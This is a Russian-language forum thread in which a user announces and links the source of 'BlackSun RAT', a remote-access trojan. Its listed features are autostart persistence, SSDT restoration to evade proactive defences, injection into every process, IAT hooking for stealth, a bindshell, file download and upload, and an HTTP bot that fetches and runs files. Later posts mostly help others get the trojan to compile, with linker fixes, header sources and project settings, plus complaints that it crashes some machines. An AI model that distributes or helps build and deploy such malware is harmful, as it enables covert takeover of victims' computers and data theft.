поздновато выкладываю, но всё же дабы было достоянием общественности:
BlackSun RAT v1.0 prebeta by Cytech
- продвинутая система удаленного администратирования. При запуске прописывается в автозагрузку и восстанавливает таблицу системных сервисов (SST) для обхода проактивных защит контролирующих process-injection. Затем инжектирует себя во все процессы и перехывает в них некоторые API-функции для сокрытия в системе методом модификации таблицы импорта (IAT-hooking). Работает в контексте заданного процесса (по дефолту explorer.exe). После чего слушает порт (по дефолту 2121) для подключений. Сервер поддерживает множество команд:
- Выполнение команд через cmd.exe
- Скрытый/видимый запуск через WinExec
- Скачка файла по HTTP-протоколу
- Закачка файла с компьютера на FTP-протокол
- Привзяка cmd.exe к заданному порту (bindshell)
- Управление питанием (выключить/перезагрузить/заснуть/встать)
- Самоуничтожение
- Завершение работы
- а также приблуды вроде открывания/закрывания CD-ROM, включения/выключения монитора и т.д. Встроен HTTP-бот, который отстукивает на статистику и получает команду на скачку и запуск заданного файла. Причем HTTP-бот работает полностью распределенно, то есть каждому боту можно выставить свою собственную команду.
Бэкдор управляется полностью через PHP-гейт. В итоге полностью невидимы файлы, ключи в реестре, процесс.
Подробнее внутри.

http://hellknights.void.ru/
http://hellknights.void.ru/releases/0x48k-blacksun-rcs-v10prebeta.rar

Давно их смотрел. Очень познавательно и интересно, НО не компилиться. Ругаеться на недостаток H файла.

Давно их смотрел. Очень познавательно и интересно, НО не компилиться. Ругаеться на недостаток H файла.
Какого именно хедера там не хватает? Если что я могу с Сайтексом сконтактировать, если сам не разберусь.

Error 1 fatal error C1010: unexpected end of file while looking for precompiled header. Did you forget to add '#include "stdafx.h"' to your source?

Error 1 fatal error C1010: unexpected end of file while looking for precompiled header. Did you forget to add '#include "stdafx.h"' to your source?
Скорее всего ты пытаешься собрать его в MSVC, что в корне неверно т.к. в readme автор совершенно чётко написал что собирать надо в компиляторе lcc. У меня собирается без проблем. lcc можно скачать здесь:
http://www.cs.virginia.edu/~lcc-win32/

Окей. Спасибо. Я действительно собирал у мелкомягких.

Вот выдержка из ридми кстати:


Сначало необходимо поправить конфигурационные файлы: conf.h (бэкдор) и conf.php (гейт).
Затем компилируем (у меня Microsoft (R) 32-bit C/C++ Standard Compiler Version 12.00.8168)

Окей. Спасибо. Я действительно собирал у мелкомягких.

Вот выдержка из ридми кстати:


Сначало необходимо поправить конфигурационные файлы: conf.h (бэкдор) и conf.php (гейт).
Затем компилируем (у меня Microsoft (R) 32-bit C/C++ Standard Compiler Version 12.00.8168)
OK, так тоже можно.

Скорее всего ты пытаешься собрать его в Msvc, что в корне неверно
Особых различий в компиляторах нет. Разве что только какиенить заумные прагмы

Йа компилел в DevC++, Mars Digital compiler, lcc.... везде ошибки... везде разные... =((
По линку с компилеру, что дал ShadOS линк на компилер не нашёл =\ только хелп и что-то ещё...

Вот полный линк.
http://www.q-software-solutions.de/pub/lccwin32.exe

Скорее всего ты пытаешься собрать его в MSVC, что в корне неверно т.к. в readme автор совершенно чётко написал что собирать надо в компиляторе lcc. У меня собирается без проблем. lcc можно скачать здесь:
http://www.cs.virginia.edu/~lcc-win32/
Скачал я оттуда компилятор, не выходит все равно:(
а где найти тот, что автор юзал?
или подскажите как скомпилить норм.

пытался скомпилировать через cl.exe:

LIBC.lib(chkstk.obj) : error LNK2005: __chkstk already defined in ntdll.lib(ntdll.dll)
blacksun.exe : fatal error LNK1169: one or more multiply defined symbols found

кто может подсказать как это исправить?

2Zliden, компиль через cl.exe - это компилятор мелкомягких. Находится по адрессу: /path/to/Visual/Studio/Vc7/bin/cl.exe

пытался скомпилировать через cl.exe:

LIBC.lib(chkstk.obj) : error LNK2005: __chkstk already defined in ntdll.lib(ntdll.dll)
blacksun.exe : fatal error LNK1169: one or more multiply defined symbols found

кто может подсказать как это исправить?
Найди это объявление в исходниках RAT.

скоро будет новая версия... ) багфикс + новые фичи. ждите )
p.s: ShadOS покажи где я написал, что компилиить надо в lcc-win32? MSVC рулит... причем VC98 :D

ShadOS
Враки всё. Не в исходниках РАТ, а действительно происходит перекрытие в ntdll.lib и libcd.lib

Причем происходит только при попытке прогнать пошагово через Студию в дебаг режиме. При простой компиляции при помощи cl.exe - все норм.

Раскрою страшную тайну, не бейте. ;)

#pragma comment(linker," /DISALLOWLIB:libcd.lib")

Вот это впишите вверху headers.h и всё скомпилится в любом варианте.
Радуйтесь все, кто до сих пор не смог это сделать.

Ребят помогите при компиляции неможет найти NTstatus.h. пытался сам его найти но не в инете не в MSDN ни в стандартных его нет. Дайте его. Буду очень благодарен

Ребят помогите при компиляции неможет найти NTstatus.h. пытался сам его найти но не в инете не в MSDN ни в стандартных его нет. Дайте его. Буду очень благодарен
смотри в DDK. Может ещё вот этот подойдёт:
http://www.cyboretum.com/tarballs/libfpx-1.2.0.9/oless/props/h/ntstatus.h
http://www.cs.colorado.edu/~main/cs1300/include/ddk/ntstatus.h

Thanks
но есть проблема скомпилировал я BlackSun RAT v1.0 by Cytech но он не на всех машинах пашет иногда в 50% случаев выпадает в синий экран. толи из-за того что антивирь не дает паметь писат там где не надо толи из-за чего-нибудь еще. Но обидно хотелось 100% случаев работы.

да и почему для загрузки используется просто реестр. Очень легко отключить.

А кеогда будет новый релиз.
Так хочется....

Aves
Скорее всего из-за того, что Cr4sh в паблик отдает невероятно сырые исходники уровня ring0. И при восстановление SST имеем BSOD.

Чтобы оно заработало как надо - там надо еще доводить и доводить, впрочем, я пока сам хз еще как... Ничего, знания доступны, времени - бесконечность. :)

Интересный экземпляр, но как-то черезчур сложно.
Сначала инжект в ядро, из ядра в юзермод - зачем такие сложности и для чего так палиться?
Файло скачиваетя по HTTP, а закачивается по FTP - что мешало просто реализовать человеческий FTP?
В общем "нипоняяятно... (c)"

что то он всеравно не компилицца

Linking...
blacksun.obj : warning LNK4098: defaultlib "libcd.lib" conflicts with use of other libs; use /NODEFAULTLIB:library
libcd.lib(crt0.obj) : error LNK2001: unresolved external symbol _main
Debug/blacksun.exe : fatal error LNK1120: 1 unresolved externals
Error executing link.exe.

blacksun.exe - 2 error(s), 1 warning(s)

#pragma comment(linker," /DISALLOWLIB:libcd.lib") - в headers.h добавил...
компилятор точно такой же как и у Cytech...
компилил через студию как проект...

Насколько я знаю, Cytch не компилит такие проекты в студии, он всё делает с консоли... :)

я просто на С не учень проограмировать умею... поэтому незнаю как с кансоли скомпилить...
может напишешь примерчик как его компилить?

У тебя проблема в этом:
libcd.lib(crt0.obj) : error LNK2001: unresolved external symbol _main

Я насколько помню, Сай делал через точку входа WinMain, а ты пытаешься скомпилить как консольное приложение. Ты когда создавал проект выбрал неправильный тип проекта, выбери "Win32 Project" вместо "Console Project".

и так и так не получается...главное выдает одно и то же...
надо как то с консольки попробовать...

народ наверное у меня какойта карявый С++ (раньше просто писал на нем несложные програмы работы с файловай системой), не пашут функции с winsock...
подскажите где можна скачать точно такой же компилятор и среду расрабоки как у Cytech, у него вроде бы microsoft visual C++ 6.0 и компилятор Standard Compiler Version 12.00.8168

Просто выпал.

я просто на С не учень проограмировать умею... поэтому незнаю как с кансоли скомпилить...
может напишешь примерчик как его компилить?

Прям в точку попал.
Для того чтобы скомпилировать что-то, нужно как минимум год программировать на С и столько же постигать восточную мудрость в горах Тибета. Так что даже не пробуй, всеравно опыта не хватит.

народ наверное у меня какойта карявый С++ (раньше просто писал на нем несложные програмы работы с файловай системой), не пашут функции с winsock...
подскажите где можна скачать точно такой же компилятор и среду расрабоки как у Cytech, у него вроде бы microsoft visual C++ 6.0 и компилятор Standard Compiler Version 12.00.8168

Однозначно! Во всем виноват этот ужасный язык. Видишь ли, дело скорее всего не в компиляторе, а в тебе.

товарисч

#include <winsock2.h>
#include <windows.h>

int main(){

SOCKET s;
struct sockaddr_in localaddr, clientaddr;
WSADATA wsaData;
typedef struct {HANDLE hRead; HANDLE hWrite;} PIPE;
PIPE input, output;
SECURITY_ATTRIBUTES sa;
STARTUPINFO st;
PROCESS_INFORMATION pr;

WSAStartup(MAKEWORD(2,2), &wsaData);
}

у меня даже это не собирается так что ж тут говарить?

Товарисч, почитайте книжку на досуге, что уж тут говорить.

ну книги у меня есть, и их читал...но причины так и не нашел - вкигах же не объясняется почему у меня что то не работает...просто если я не прав скажи в чем тут дело.......

Паразит, ну правда... Полазь по кодерским форумам, почитай что они пишут... Все вопросы, которые ты задаёшь в своей основе относятся к азам программирования... Тут тебе никто не станет рассказывать как настроить компилятор, какие ему передать параметры, как создать и настроить проект под определённое приложение... Просто это отнимет время и ничему тебя не научит - в одно ухо влетит, а в другое вылетит и Ниокс так и будет над тобой глумиться... А чтобы у тебя заработала сокетная библиотека нужно добавит в проект либу ws2_32.lib. Если бы ты смотрел исходники Сая, ты бы увидел это:

#pragma comment(lib, "ws2_32.lib")

В файле functions.h 151 строка:

static DWORD WINAPI ExecuteCMD(char * command) //151
...
char cmdpath[256]; //160
...
GetEnvironmentVariable(COMSPEC, cmdpath, 2048); //186

Здесь вроде переполнение. Или это фича? ;)

не думай, GetEnvironmentVariable для несуществующей переменной окружения ничего не запишет в буфер. поиск по GetEnvironmentVariable и crt-функции putenv результата не дал, стало быть если "сайтег" не захотел сделать специально уязвимую версию бота, в чем я сомневаюсь, можно этим строчкам кода доверять:)